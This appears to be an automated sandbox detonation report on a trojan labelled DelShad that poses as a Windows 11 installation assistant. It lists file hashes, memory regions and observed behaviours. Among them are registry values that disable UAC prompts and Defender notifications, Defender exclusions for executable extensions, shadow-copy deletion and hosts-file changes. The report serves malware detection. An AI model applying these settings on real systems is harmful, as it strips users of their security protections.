| SHA256 | dc24023611f63b84f4fddc095a1417518ae1972743dbbff014d31218770e48d6 |
| SHA512 | b1551197efd2209b633ed0ca581332a1871416a541a64ef99dffd75c7a082b65c4fa3abdc15b84ff92cdac224c6616a40c17b33c268df3f6244f0b2c920b143c |
memory/5064-493-0x0000000000400000-0x00000000006A8000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\is-D00HJ.tmp\tmp\.cmd
| MD5 | 6f0d036f6681bac6fd742591ddc62808 |
| SHA1 | 2e518c19ec29b7a3a69cd9d4c120d3b88d71102b |
| SHA256 | ce8f0822d428e39157fc6ed433b8da7fa7ce62ece2c73bed9930d50f7cb41f24 |
| SHA512 | 8aeb47d8a15ab62a1a6e23f93a916f361703d2ac64a302d2364d40de016dc2167d653ca905197d81e4c578fdbb81eb88a22c7cd81abe08756ec86dda6a44aaf6 |
memory/244-498-0x0000000000400000-0x000000000071D000-memory.dmp
memory/5064-499-0x0000000000400000-0x00000000006A8000-memory.dmp
memory/1092-502-0x0000000000400000-0x00000000004E3000-memory.dmp
memory/5064-505-0x0000000000400000-0x00000000006A8000-memory.dmp
memory/3788-506-0x0000000000400000-0x0000000000AE1000-memory.dmp
memory/5064-511-0x0000000000400000-0x00000000006A8000-memory.dmp
memory/3788-509-0x0000000000400000-0x0000000000AE1000-memory.dmp
memory/3788-512-0x0000000000400000-0x0000000000AE1000-memory.dmp
memory/3788-513-0x0000000000400000-0x0000000000AE1000-memory.dmp
memory/3788-510-0x0000000000400000-0x0000000000AE1000-memory.dmp
memory/3788-508-0x0000000000400000-0x0000000000AE1000-memory.dmp
memory/3788-515-0x0000000000400000-0x0000000000AE1000-memory.dmp
memory/3788-516-0x0000000000400000-0x0000000000AE1000-memory.dmp
memory/3788-517-0x0000000000400000-0x0000000000AE1000-memory.dmp
memory/3788-514-0x0000000000400000-0x0000000000AE1000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\write.zip
| MD5 | ccdde9cc37916d92365eca66f652c422 |
| SHA1 | 4a5ac27e151f695bb2c3db1d81484fb4d22c6e88 |
| SHA256 | 6e0b8d11701537039d645d93e5668e4707d8405310ff84b453f533e60b8b0ad9 |
| SHA512 | 8f416c23545d144a4b5d0796a41b3ec7c9a228d782cab0d105cfdeb1e163f2e865c62392dcc2cac5444bb54e5db7228a903b4de8ce9c9bf0cf2eba2a9be20d9a |
memory/3788-546-0x0000000000400000-0x0000000000AE1000-memory.dmp
memory/3788-547-0x0000000000400000-0x0000000000AE1000-memory.dmp
memory/3788-548-0x0000000000400000-0x0000000000AE1000-memory.dmp
memory/3788-550-0x0000000011000000-0x0000000011158000-memory.dmp
memory/3788-551-0x0000000003310000-0x00000000033B7000-memory.dmp
memory/2072-555-0x0000015EBD850000-0x0000015EBD872000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_hpga2sz0.3qt.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3788-566-0x0000000000400000-0x0000000000AE1000-memory.dmp
memory/3788-567-0x0000000000400000-0x0000000000AE1000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | e6715c0ab4c24c5abc960a22692aef15 |
| SHA1 | a561bdf85293e36f512d8748c5dc8d585922b423 |
| SHA256 | 1b813abfe6905cda42a9231b4ebc20eda99ee2d6b7cee3e357104be0493a915d |
| SHA512 | eb4222cf1b14a011649b58d5687cb77248021f5fd57c72e83dd98bea30ecb20f97e6fd27ceb44928a0396669f599e3f781101d553c1107497987435cab51fca0 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | 93cdbe0e6c1df80fa22c120f8c69b8c6 |
| SHA1 | bd436c9dc25544376b12551f49d2084197f38119 |
| SHA256 | 0b2f5bb87372b51ebb75c4b6f9662e1dec0cbec909ff537348a3af4faa506e71 |
| SHA512 | 94d8baa7f32fe19541f92dd285293aed06d512554b5d3a01f728f933572bf5af84f028f2fd0e27f9101d0f7f08c10bfac80beb5996e3f1177a5b98803d238fe7 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 88dc70c361a22feac57b031dd9c1f02f |
| SHA1 | a9b4732260c2a323750022a73480f229ce25d46d |
| SHA256 | 43244c0820ec5074e654ecd149fa744f51b2c1522e90285567713dae64b62f59 |
| SHA512 | 19c0532741ebc9751390e6c5ca593a81493652f25c74c8cab29a8b5b1f1efef8d511254a04f50b0c4a20724bae10d96d52af7a76b0c85ddc5f020d4cac41100c |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 0ac871344dc49ae49f13f0f88acb4868 |
| SHA1 | 5a073862375c7e79255bb0eab32c635b57a77f98 |
| SHA256 | 688f15b59a784f6f4c62554f00b5d0840d1489cef989c18126c70dfee0806d37 |
| SHA512 | ace5c50303bd27998607cf34ac4322bcf5edfbd19bbb24309acf4d037b6f3f7636c7c14b6ac0b924114e036252d3a1b998951c7068f41548728fa5d92f5f9006 |
memory/3788-585-0x0000000000400000-0x0000000000AE1000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | a64e2bf847968c3ebb0352d94ebc31bb |
| SHA1 | 4393503722001bacc9e530563fb6df1a1fa2290d |
| SHA256 | 7ea0c8928258bff6059853248fcd29e072164ae919bd212836071068a667d884 |
| SHA512 | 54a60607f0fbc938c6cf3da171c18089c1465f1ccee30d97b352a6799f6417f4fa088fd8eda45e06037bf62cdeef707d72da1073e57b5883b3b4acb7705dfb5e |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | a28c02af6cefdbe36e78dcef7d28174e |
| SHA1 | 229da39044752b3c6d8ff548dafd0b45bfec4046 |
| SHA256 | 45223a4f7f19aa9fb5fcc63c2f1e7363e2e9226817b5ef2b30f0f1a869a1db0a |
| SHA512 | 99a16b83b9a514ededcd30dd1135cf43ec418cb145161fdbba8c7319e4d70dfa9a2c44180215f6f859e0345901103f5517f4543f59e6e949cdb057c672020661 |
C:\Users\Admin\AppData\Local\Temp\irf37rj215240672703.tmp
| MD5 | 9025ce192ba676569c935459d0e1e249 |
| SHA1 | 1c9754ccf27e5bcf4bf4d1fb55e5485c12008d31 |
| SHA256 | d499f5213314049a8f8a628dcccb550758a8bd25639bd7c05e776c4ff7692c0c |
| SHA512 | 7de59dd50602e05f301ee84539a93a61c49ab26ac3946756414529414e23ffb46d9b2fda64c3a43e712e7b75ee5fe6b6a4e4847931dda5cac206948c8ac989a9 |
C:\Users\Admin\AppData\Local\Temp\0pg7b8xtdpt240672703.tmp
| MD5 | 8566283dfca310d83f7a01ea331b2b45 |
| SHA1 | bec1230578a4d4868dea90cfa0ee164d6b9a6359 |
| SHA256 | 792739bc125102e5f41e3e8201e01c5c93fd9c974cd822223b05c4aa69fab8b1 |
| SHA512 | a2d3a49fff50a685c1d9bd041037f98c8e3b1f72c12bfb245716f845b2049c0304c8f3c648ec4077bd0da01aa1b6cba1921e3dfd1d7f1d66b53748e5c28b54c9 |
memory/3788-609-0x0000000000400000-0x0000000000AE1000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\13s111wjws4240672703.tmp
| MD5 | eeba08205e37c96d0cd827c4c52fa1ee |
| SHA1 | e613d220aa3ee59f244eeb3c3168712ce2d03ad2 |
| SHA256 | c6c7eb15ef41404fbd3db5ca99cbeb52da54cb6d0c8d05e4abbb31afe103693a |
| SHA512 | 796951952ad013868cbcc160e51e05888fb1c61a9a8781849733db058ac251a09eb892d163aedb3b8c897b19d56d4257ddaab0608493b4d5257f16d3e1e1e71a |
\??\PIPE\srvsvc
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | 85ae502287d00cd1c8c2f8a647e8a443 |
| SHA1 | f6b415dcdd8f0769657b7c4415f51df6bdb714d0 |
| SHA256 | 52b985751035f16bfe48694eb912e5e5094fb294b3e89ebd6bd502115ba3e098 |
| SHA512 | 854a211a60d9b0004e9b8e2b1d2a9d91ec1d276e2c1898f5b73b24571476d0568f6a322548fdea74fc52fbe503d0dfc886764151bf3dfcf47bf28710e1a71189 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 558251ab9bc9c2e10e44975a894657a5 |
| SHA1 | 7e6272db305c4da30b8ce063274bde520f0b4a92 |
| SHA256 | ef8a4bd0c8abbb6dd921e1c04c7e5b54eaca2079f8ae5eaed3f9db7ec9de43e4 |
| SHA512 | 239a85d42c6546dc28bb7c76b448632a959695b64045baaef6abd83a5246884adba715b74cc1debe4ff126c838a36b4fe10eb2bc080f0957d421f3e932310ecf |
C:\Users\Admin\AppData\Local\Temp\iv06ldrfve1q240678812.tmp
| MD5 | 40f3eb83cc9d4cdb0ad82bd5ff2fb824 |
| SHA1 | d6582ba879235049134fa9a351ca8f0f785d8835 |
| SHA256 | cdd772b00ae53d4050150552b67028b7344bb1d345bceb495151cc969c27a0a0 |
| SHA512 | cdd4dbf0b1ba73464cd7c5008dc05458862e5f608e336b53638a14965becd4781cdea595fd6bd18d0bf402dccffd719da292a6ce67d359527b4691dc6d6d4cc2 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | cc01fedd976dca806b8041b28d58b1a2 |
| SHA1 | 6ef20eef3325384fac647495b4d24d9402496de2 |
| SHA256 | fbefbe77b5d69d8a45d63019d2f2d92f149ca5a07dcaf4a61041f20a5df740f3 |
| SHA512 | bc910406d58bf6cc9598e1505b498d4286398492d4a51eff12028f615ceb5b6da0c0dafb10ad3136be698f60397d607011d2cc2577774bda7f359095ee4a5b6e |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | c4273f170169bb353809542b107cbd85 |
| SHA1 | 1dc690ec9521c5aded719c7925d428271eeb2706 |
| SHA256 | b3efd6f2403ed3b19c8e7488b272bd2d024fe64d1ada4e5e22a2041fa66157f4 |
| SHA512 | 9a23e0d07db1f8ca882ffe6b669bb2814a3f19b148d7a27b9c1f4e139be76bf81ceae73714d0e43e397c463265b58bbe411be662f50f1f96a081229ca378d6fc |
memory/3788-649-0x0000000000400000-0x0000000000AE1000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | 1929a30a273d0d72ef691ae9aae56a19 |
| SHA1 | e4013eda41e58edddfe1e3e18edac6c5304bbc16 |
| SHA256 | faf9b0285dc23812a65bd084a1c1d42f55000af735c47a9061225d7f6e5bdf40 |
| SHA512 | 2f435fd851f8e530facd65770fdc3e374f7788dfa758c832eb8b5176e792ec01c32ac3371b27c3b45b368c1b438b56e2b6b94a3e34bb5e3e6e8216e41f63a31f |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | e5c112cd94bf70f4ed28f38c1f7f77ea |
| SHA1 | 57166a77f586d69bb20f73010b4cebc096ae547e |
| SHA256 | 50b37805575f20df2ffb5db5155c897a5c80d043dd845c7f441938bedbd3927c |
| SHA512 | b38ab000f245e76280a358f1020203df3cd9877e750f94bfcb8966129ebee328e4f625b2fb3592ef449d9fd05f4213d597bed175bbcc2c76fa54e28acebe3800 |
memory/3788-666-0x0000000000400000-0x0000000000AE1000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | dbd0e73e9d56cf55a65703804237b8bd |
| SHA1 | fc8147a150a3490caf474bb4f6be1dedd9244d21 |
| SHA256 | 3a72a71088fd433709bd04feac6870bad7ea419226245d60606c47a20318333c |
| SHA512 | 0404671c29cfedf3599eb11ea5c512a9b5fa81a36cde4cc58766c15af0f8854dccb8abd2d7351a6d4e4bf00910175ce250158e76cbb08163e178224ea2d8882d |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 10254f48b63b60ae6245903153592e48 |
| SHA1 | 2c300d1c60c50e8896705022bc402c423681f40a |
| SHA256 | b3778ffb5260878714023fd1abc70c4e850b5397c2b32a3975b1ff28bfd96c69 |
| SHA512 | 6a7e7844c47a07bc8fd0b59267f0d1bac460f672ada93131edd65ca2eb33159de9f6291a1acde745f32991b364e9ceac697f2dfcf1a2696b51a9120dd7af77d4 |
memory/3788-686-0x0000000000400000-0x0000000000AE1000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\lbuwut6e1qq0lobf8g9m5vg5.tmp
| MD5 | 6e385672eb1a43fbb98a999a115aef59 |
| SHA1 | 8fd6499f2f2f847b6e104793bd5c5267e83d5855 |
| SHA256 | c7f9605f9bb601c465d5f3ad7e82f310a3dc2530b51c079f2df12f6b54f34f84 |
| SHA512 | 73ddf9eccda70dc366631a1098766b418f39749bd0259ccb5d06939ec111a1440f7c164007f13bde92d7f9f3b83625d06919e2423da29797bbdc6e79d0f45a9e |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | a95ab0f52da4fea8d2fc07dc1424e3b3 |
| SHA1 | b2530fc1aa315b043f433b16d4800ed3c0f48c9b |
| SHA256 | be08ce5442138a4858625a8506272c11ce0306f0b3d1a107755ee1037dd2bed7 |
| SHA512 | 21dc3eadf72ee06551c0c6501ff68d56eca5a3c96a47d9fe769da117ca3a911ddfc4c6abe8f6ac5d5683239fffeb15038431c40a9e2dd7736699b0477d1b8b57 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | 44ffe2bf9342f010ab716e7b0def477a |
| SHA1 | 220883a35211c91579d3f5fcbae518c4aa4805a6 |
| SHA256 | 1ece58e560f9d2d7abb644ab12234b102c9dffc4a18ee5fb4f62218f9a906d0b |
| SHA512 | 0f261fdc66074e14ee2b89b67354fd79b568380697fbb1743acd61f4d013c9652f8217a36d7763fde3edb4aad4b803f17b8939771ec9e12f3ba87841c6ae4ba1 |
memory/3788-712-0x0000000000400000-0x0000000000AE1000-memory.dmp
memory/3788-732-0x0000000000400000-0x0000000000AE1000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | 29ea5a6dcf77dce7c49b0e4024ca405f |
| SHA1 | 74f244738fa71dc8277335df818e948783edd5ae |
| SHA256 | 6a15d52ff448326ab9b290e60c80262af118f5b5bb3b34349b9dca1f3ac45e58 |
| SHA512 | 0b50b0278c92e549110afedfc968db74b281efe78e3684c56d72bf609b7fed7c6d48b296d5b9706e5540268e1967b20677c274adc21171f9e1de1c4fff90b37c |
memory/3788-755-0x0000000000400000-0x0000000000AE1000-memory.dmp
memory/3788-757-0x0000000000400000-0x0000000000AE1000-memory.dmp
memory/3788-767-0x0000000000400000-0x0000000000AE1000-memory.dmp
memory/1116-772-0x0000000002E30000-0x0000000002E66000-memory.dmp
memory/1116-773-0x0000000005530000-0x0000000005B5A000-memory.dmp
memory/1116-774-0x0000000005460000-0x0000000005482000-memory.dmp
memory/1116-775-0x0000000005C50000-0x0000000005CB6000-memory.dmp
memory/1116-776-0x0000000005CC0000-0x0000000005D26000-memory.dmp
memory/1116-785-0x0000000005D30000-0x0000000006087000-memory.dmp
memory/1116-786-0x00000000061E0000-0x00000000061FE000-memory.dmp
memory/1116-787-0x0000000006220000-0x000000000626C000-memory.dmp
memory/1116-788-0x0000000007380000-0x0000000007416000-memory.dmp
memory/1116-789-0x00000000066E0000-0x00000000066FA000-memory.dmp
memory/1116-790-0x0000000006730000-0x0000000006752000-memory.dmp
memory/1116-791-0x00000000079D0000-0x0000000007F76000-memory.dmp
memory/3788-809-0x0000000000400000-0x0000000000AE1000-memory.dmp
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-14 23:57
Reported
2024-11-14 23:58
Platform
win7-20240903-en
Max time kernel
29s
Max time network
34s
Command Line
Signatures
Modifies Windows Defender notification settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\WIndoWs defender sECuritY centEr\notIFICATions | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\WIndoWs defender sECuritY centEr\notIFICATions\dIsablEEnhAncEdnOtiFiCatiOns = "1" | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\sOFTwAre\micrOsOfT\WIndoWs defender sECuritY centEr\notIFICATions | C:\Windows\system32\reg.exe | N/A |
UAC bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\COnsEnTPromptbehavIOrUser = "0" | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromPTOnsECUredesKtoP = "0" | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\COnsenTPrompTbEhAvIoradmin = "0" | C:\Windows\system32\reg.exe | N/A |
Windows security bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Extensions\SCr = "0" | C:\Windows\system32\rEG.EXE | N/A |
| Key created | \REGISTRY\MACHINE\sOFTWArE\mIcrOsofT\WindoWS dEFEndEr\ExClUsions\ExTEnSIOns | C:\Windows\system32\rEg.EXE | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Extensions\Cmd = "0" | C:\Windows\system32\rEg.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SofTWArE\mIcrosOfT\windOwS dEfENdEr\EXClUSiOnS\ExtEnSIOns | C:\Windows\system32\rEg.EXE | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Extensions\EXE = "0" | C:\Windows\system32\rEg.EXE | N/A |
| Key created | \REGISTRY\MACHINE\soFtwarE\mIcroSoFT\WINdows dEfEndEr\ExclUSiOnS\EXTENsiONs | C:\Windows\system32\rEG.EXE | N/A |
Deletes shadow copies
Disables use of System Restore points
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\system32\drivers\etc\hosts | C:\Windows\System32\cmd.exe | N/A |
Sets file to hidden
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows11InstallationAssistant.lnk | C:\Users\Admin\AppData\Local\Temp\is-MKHMM.tmp\Trojan.Win32.DelShad.tmp | N/A |
Executes dropped EXE
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Trojan.Win32.DelShad.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Trojan.Win32.DelShad.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-MKHMM.tmp\Trojan.Win32.DelShad.tmp | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-MKHMM.tmp\Trojan.Win32.DelShad.tmp | N/A |
Modifies file permissions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 980 set thread context of 1312 | N/A | C:\Users\Admin\AppData\Roaming\Windows11InstallationAssistant\Windows11InstaIIation.scr | C:\Users\Admin\AppData\Roaming\Windows11InstallationAssistant\Windows11InstaIIation.sCr |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\Logs\CBS\CbsPersist_20241114235820.cab | C:\Windows\system32\makecab.exe | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Trojan.Win32.DelShad.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-M7KKU.tmp\Trojan.Win32.DelShad.tmp | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-E4R4U.tmp\tmp\rp.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-E4R4U.tmp\tmp\rp.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-E4R4U.tmp\tmp\rp.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-E4R4U.tmp\tmp\rp.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-MKHMM.tmp\Trojan.Win32.DelShad.tmp | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-E4R4U.tmp\tmp\rp.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-E4R4U.tmp\tmp\rp.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-E4R4U.tmp\tmp\rp.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-E4R4U.tmp\tmp\rp.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-E4R4U.tmp\tmp\rp.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Trojan.Win32.DelShad.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-E4R4U.tmp\tmp\rp.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-E4R4U.tmp\tmp\rp.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-E4R4U.tmp\tmp\rp.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\Windows11InstallationAssistant\Windows11InstaIIation.scr | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\Windows11InstallationAssistant\Windows11InstaIIation.sCr | N/A |
System Network Configuration Discovery: Internet Connection Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\find.exe | N/A |
| N/A | N/A | C:\Windows\system32\find.exe | N/A |
Interacts with shadow copies
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\vssadmin.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" | C:\Users\Admin\AppData\Local\Temp\is-E4R4U.tmp\tmp\rp.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Users\Admin\AppData\Local\Temp\is-E4R4U.tmp\tmp\rp.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" | C:\Users\Admin\AppData\Local\Temp\is-E4R4U.tmp\tmp\rp.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" | C:\Users\Admin\AppData\Local\Temp\is-E4R4U.tmp\tmp\rp.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" | C:\Users\Admin\AppData\Local\Temp\is-E4R4U.tmp\tmp\rp.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" | C:\Users\Admin\AppData\Local\Temp\is-E4R4U.tmp\tmp\rp.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" | C:\Users\Admin\AppData\Local\Temp\is-E4R4U.tmp\tmp\rp.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Users\Admin\AppData\Local\Temp\is-E4R4U.tmp\tmp\rp.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" | C:\Users\Admin\AppData\Local\Temp\is-E4R4U.tmp\tmp\rp.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Users\Admin\AppData\Local\Temp\is-E4R4U.tmp\tmp\rp.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Users\Admin\AppData\Local\Temp\is-E4R4U.tmp\tmp\rp.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" | C:\Users\Admin\AppData\Local\Temp\is-E4R4U.tmp\tmp\rp.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-MKHMM.tmp\Trojan.Win32.DelShad.tmp | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Windows11InstallationAssistant\Windows11InstaIIation.scr | N/A |
Suspicious use of WriteProcessMemory
Uses Volume Shadow Copy service COM API
Views/modifies file attributes
